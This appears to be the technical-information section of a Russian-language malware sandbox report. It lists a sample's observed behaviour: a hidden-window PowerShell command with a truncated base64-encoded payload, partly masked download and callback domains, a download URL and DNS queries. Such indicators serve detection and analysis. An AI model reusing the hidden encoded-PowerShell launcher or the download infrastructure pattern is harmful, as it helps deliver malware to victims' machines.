Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\952885.cvr
- 'it###ezle.com':80
- 'gu########plot.flywheelsites.com':443
- http://it###ezle.com/jhq5ds/zBA6DPHN/
- 'gu########plot.flywheelsites.com':443
- DNS ASK aq###avour.com
- DNS ASK it###ezle.com
- DNS ASK ri######arfoundation.org
- DNS ASK qu###washing.cl
- DNS ASK gu########plot.flywheelsites.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABNAHIAdgBxAHYAZgBjAGUAaQBwAHMAbAA9ACcAWABmAHcAcgBwAGYAYwB5AGIAZQBpAG0AJwA7ACQAWAB6AHcAaABoAHAAaABnAHYAYgBmAHoAZQAgAD0AIAAnADMAMgAwACcAOwAkAFYAZgB3AGsAbgB6AG4AegB0AGsAcQB1AHYAPQA...' (со скрытым окном)